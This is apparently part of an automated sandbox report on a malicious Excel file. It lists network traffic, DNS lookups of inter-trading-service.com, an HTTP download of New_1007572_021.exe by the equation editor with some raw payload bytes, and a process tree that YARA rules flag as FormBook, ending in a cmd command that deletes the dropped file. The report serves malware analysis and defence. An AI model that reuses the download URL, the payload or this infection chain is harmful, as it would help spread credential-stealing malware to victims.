                                                                    Aug 3, 2021 19:48:49.243325949 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.243381023 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.243408918 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.243408918 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.243426085 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.243446112 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.243446112 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.243485928 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.243494987 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.243541002 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.244494915 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.245321035 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.245352983 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.245381117 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.245394945 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.245403051 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.245413065 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.245417118 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.245429039 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.245434046 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.245452881 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.245470047 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.245472908 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.245481968 CEST8049165160.153.129.234192.168.2.22
                                                                    Aug 3, 2021 19:48:49.245505095 CEST4916580192.168.2.22160.153.129.234
                                                                    Aug 3, 2021 19:48:49.245512962 CEST8049165160.153.129.234192.168.2.22

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Aug 3, 2021 19:48:49.033301115 CEST5219753192.168.2.228.8.8.8
                                                                    Aug 3, 2021 19:48:49.071100950 CEST53521978.8.8.8192.168.2.22
                                                                    Aug 3, 2021 19:48:49.071474075 CEST5219753192.168.2.228.8.8.8
                                                                    Aug 3, 2021 19:48:49.106981993 CEST53521978.8.8.8192.168.2.22

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                    Aug 3, 2021 19:48:49.033301115 CEST192.168.2.228.8.8.80xb648Standard query (0)inter-trading-service.comA (IP address)IN (0x0001)
                                                                    Aug 3, 2021 19:48:49.071474075 CEST192.168.2.228.8.8.80xb648Standard query (0)inter-trading-service.comA (IP address)IN (0x0001)

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                    Aug 3, 2021 19:48:49.071100950 CEST8.8.8.8192.168.2.220xb648No error (0)inter-trading-service.com160.153.129.234A (IP address)IN (0x0001)
                                                                    Aug 3, 2021 19:48:49.106981993 CEST8.8.8.8192.168.2.220xb648No error (0)inter-trading-service.com160.153.129.234A (IP address)IN (0x0001)

                                                                    HTTP Request Dependency Graph

                                                                    • inter-trading-service.com

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.2249165160.153.129.23480C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                    TimestampkBytes transferredDirectionData
                                                                    Aug 3, 2021 19:48:49.153964043 CEST0OUTGET /Di4/New_1007572_021.exe HTTP/1.1
                                                                    Accept: */*
                                                                    Accept-Encoding: gzip, deflate
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Host: inter-trading-service.com
                                                                    Connection: Keep-Alive
                                                                    Aug 3, 2021 19:48:49.187442064 CEST2INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Aug 2021 17:48:49 GMT
                                                                    Server: Apache
                                                                    Upgrade: h2,h2c
                                                                    Connection: Upgrade, Keep-Alive
                                                                    Last-Modified: Mon, 02 Aug 2021 22:35:37 GMT
                                                                    ETag: "870006b-6f200-5c89b30292d99-gzip"
                                                                    Accept-Ranges: bytes
                                                                    Vary: Accept-Encoding,User-Agent
                                                                    Content-Encoding: gzip
                                                                    Keep-Alive: timeout=5, max=100
                                                                    Transfer-Encoding: chunked
                                                                    Content-Type: application/x-msdownload
                                                                    Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec fc 77 20 d5 ef fb 00 0e 9f 63 ef bd 57 07 d9 eb 2c c7 39 48 56 64 cb 96 d5 99 46 56 36 21 45 25 21 33 8a 94 99 d0 94 95 0a 19 51 54 4a 85 86 4d a5 34 48 25 f2 bb 5f 87 ea fd fe 7c 3e df df f3 fc f5 fc f5 a8 73 9d 7b 5c f7 75 5f f7 b5 ef d7 4b d9 ec ce 82 31 c2 60 30 26 f0 59 5f 87 c1 9a 61 1b 3f 86 b0 ff cf 3f 49 e0 c3 b3 e5 06 0f ec 3a fb 80 6c 33 dc 7a 40 d6 c9 cf 3f 1c 11 1a 16 e2 1b 46 0c 42 90 89 c1 c1 21 11 08 12 15 11 16 19 8c f0 0f 46 98 da 39 22 82 42 28 54 4d 6e 6e 8e ad 9b 34 ec 77 c0 60 d6 70 46 58 50 b8 ca d8 6f ba e3 30 1e 38 27 1c 09 83 55 b1 c0 60 96 1b 63 99 dd a0 8d 80 26 59 36 b8 83 da 0c 1b 7c c3 60 7f bf 61 7b 58 e9 e3 30 fa b4 e1 61 18 8c 8f fe f7 ef f7 9f af 8d 73 02 ba 56 b0 0d ba 4b 66 ff e3 90 86 ac 30 ae ff 2f 64 f1 5f 3f 80 3f b6 7f 74 d9 40 7f e7 3f fa 9a 11 d4 98 08 f0 9d 57 b9 79 2e e8 ac 0c ff 45 62 8f 66 58 78 18 19 b4 e9 bc 41 67 87 88 54 b3 fc 9b 45 f0 57 33 8c 1a 18 02 10 b9 36 79 a6 d3 fa f4 5f 78 c6 ff c9 66 68 f7 06 0e 44 96 01 c6 0c 4b d2 87 c1 d2 d5 61 74 9b 00 5f 2c 5c fe e0 db 93 e5 3f 97 fd 9f 3f 82 48 46 98 01 f8 86 c3 60 fc 0c ca 00 72 40 87 83 25 0a 03 15 e9 f2 82 96 22 9e 19 40 fc f8 fa fa fa 2f c0 ec 0e 80 02 a3 8f 40 68 0c ca 40 8f 2c f4 a6 2a 90 51 38 58 c0 12 02 4e c2 a1 0a d1 4d d8 a4 8b 0f 02 0d fa 62 e8 90 1e bf 09 b8 40 04 f6 03 04 26 65 56 88 0a 07 34 48 9f 91 82 66 18 95 19 ff 70 03 04 c5 44 b8 0d 58 50 c4 5f 07 70 63 15 61 04 34 11 10 3f 89 68 88 db 12 fa 7c 1e 80 aa 8c ba d0 1c fe d2 3a e4 22 e0 8c 4c c0 46 37 79 29 f8 cd 0b d3 26 1f c7 c0 27 18 7c f8 ff 1c 4a 44 99 07 e2 e7 0a d4 16 85 4e c8 81 57 82 da 0c bf 58 c0 01 58 c2 c1 2a 0e 65 6e d0 da 60 ce 0a e2 e5 22 7d f3 72 88 39 84 38 c0 42 30 83 dd c2 59 20 4c 0e 08 93 ce 66 04 c4 66 32 1d 33 16 c2 0c 03 a3 a1 ca 5c d0 66 67 a1 be 32 1b d4 14 86 f6 da 98 e2 84 96 42 42 c3 db 40 f3 72 a0 65 04 40 92 51 38 2b 44 99 1d 9a 86 34 ff 0b 30 8c 57 84 4e ae 98 08 39 99 d0 2f 38 d0 87 04 bd ad 0a 53 fd 05 10 43 d8 20 b5 6c b4 a1 85 a0 ad 0b b5 7f b1 c3 61 10 8b ff ea 73 fe 47 9f eb df fd 10 ee ff 98 e7 f9 8f 3e 2f bd 0f c9 3d fe b7 6d 85 81 35 a1 09 80 59 a6 4d cb 11 01 cc 87 ed 80 4e 29 0a 5a 09 4c 7f 67 e8 56 48 17 d8 5e 48 b4 ff b0 c2 c6 df 56 c8 b0 a9 3c 96 df 4a 53 65 50 16 fe a3 11 79 68 d9 30 5d ce 0f 00 84 f8 d0 86 d3 5d 8c 9f 4e 97 2e 2e d8 6f 43 60 d9 a4 05 59 c6 10 f8 78 81 4f 0b f8 6c f9 4d 1b 6f 0e 00 5d ce 89 d2 90 06 ef d1 29 b7 03 98 08 84 ca a4 a0 db 0e 71 48 d7 53 a2 02 84 70 81 8e 00 a9 94 1f ae 0b 99 35 02 32 36 7c ce c6 00 fd 24 7c d0 e8 1b 40 53 99 0f b2 2f 04 fd 08 88 25 c0 1d 1d 6c 58 0e 3f 24 08 3a ba 2b 7d a9 a8 bb 20 1c 0f 11 67 08 11 80 e6 25 c0 89 05 e1 1b 67 16 85 36 46 d2 37 86 0c 41 59 10 20 00 83 e5 87 0c 56 08 42 96 84 6c 2b 01 62 1a d8 0e d3 2f 16 15 68 06 c8 8c 43 21 09 3a 45 b8 08 d4 14 55 06 be c7 a2 a0 2c
                                                                    Data Ascii: 1faaw cW,9HVdFV6!E%!3QTJM4H%_|>s{\u_K1`0&Y_a??I:l3z@?FB!F9"B(TMnn4w`pFXPo08'U`c&Y6|`a{X0asVKf0/d_??t@?Wy.EbfXxAgTEW36y_xfhDKat_,\??HF`r@%"@/@h@,*Q8XNMb@&eV4HfpDXP_pca4?h|:"LF7y)&'|JDNWXX*en`"}r98B0Y Lff23\fg2BB@re@Q8+D40WN9/8SC lasG>/=m5YMN)ZLgVH^HV<JSePyh0]]N..oC`YxOlMo])qHSp526|$|@S/%lX?$:+} g%g6F7AY VBl+b/hC!:EU,


                                                                    Code Manipulations

                                                                    Statistics

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Start time:19:48:42
                                                                    Start date:03/08/2021
                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    Wow64 process (32bit):false
                                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /dde
                                                                    Imagebase:0x13f720000
                                                                    File size:27641504 bytes
                                                                    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:19:48:44
                                                                    Start date:03/08/2021
                                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                    Imagebase:0x400000
                                                                    File size:543304 bytes
                                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Visual Basic
                                                                    Reputation:high

                                                                    General

                                                                    Start time:19:48:46
                                                                    Start date:03/08/2021
                                                                    Path:C:\Users\Public\tynex.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\Public\tynex.exe
                                                                    Imagebase:0x11a0000
                                                                    File size:455168 bytes
                                                                    MD5 hash:41137FD61B9CC0D92225C91660A5902C
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2163601138.0000000003766000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2163601138.0000000003766000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2163601138.0000000003766000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2163885582.000000000391C000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2163885582.000000000391C000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2163885582.000000000391C000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2163507996.000000000362D000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2163507996.000000000362D000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2163507996.000000000362D000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 28%, ReversingLabs
                                                                    Reputation:low

                                                                    General

                                                                    Start time:19:49:15
                                                                    Start date:03/08/2021
                                                                    Path:C:\Users\user\AppData\Local\Temp\tynex.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Local\Temp\tynex.exe
                                                                    Imagebase:0x380000
                                                                    File size:455168 bytes
                                                                    MD5 hash:41137FD61B9CC0D92225C91660A5902C
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2166292302.0000000000404000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2166292302.0000000000404000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2166292302.0000000000404000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 28%, ReversingLabs
                                                                    Reputation:low

                                                                    General

                                                                    Start time:19:49:16
                                                                    Start date:03/08/2021
                                                                    Path:C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exe'
                                                                    Imagebase:0x400000
                                                                    File size:3072 bytes
                                                                    MD5 hash:74BAFB3E707C7B0C63938AC200F99C7F
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 5%, Metadefender, Browse
                                                                    • Detection: 2%, ReversingLabs
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:19:49:17
                                                                    Start date:03/08/2021
                                                                    Path:C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe'
                                                                    Imagebase:0x1340000
                                                                    File size:186368 bytes
                                                                    MD5 hash:48ECE2CA39A9EAE7FCED7418CF071D46
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2220838294.0000000001341000.00000020.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2220838294.0000000001341000.00000020.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2220838294.0000000001341000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2220048817.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2220048817.00000000001F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2220048817.00000000001F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe, Author: JPCERT/CC Incident Response Group
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 49%, Metadefender, Browse
                                                                    • Detection: 86%, ReversingLabs
                                                                    Reputation:low

                                                                    General

                                                                    Start time:19:49:19
                                                                    Start date:03/08/2021
                                                                    Path:C:\Windows\explorer.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                    Imagebase:0xffca0000
                                                                    File size:3229696 bytes
                                                                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:19:49:39
                                                                    Start date:03/08/2021
                                                                    Path:C:\Windows\SysWOW64\cscript.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\cscript.exe
                                                                    Imagebase:0xd00000
                                                                    File size:126976 bytes
                                                                    MD5 hash:A3A35EE79C64A640152B3113E6E254E2
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2358933329.0000000000070000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2358933329.0000000000070000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2358933329.0000000000070000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2359161562.00000000001B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2359161562.00000000001B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2359161562.00000000001B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2360905373.0000000002BFF000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2360905373.0000000002BFF000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2360905373.0000000002BFF000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2359102691.0000000000140000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2359102691.0000000000140000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2359102691.0000000000140000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2359372203.0000000000792000.00000004.00000020.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2359372203.0000000000792000.00000004.00000020.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2359372203.0000000000792000.00000004.00000020.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:19:49:43
                                                                    Start date:03/08/2021
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:/c del 'C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe'
                                                                    Imagebase:0x49de0000
                                                                    File size:302592 bytes
                                                                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Disassembly

                                                                    Code Analysis

                                                                    Reset < >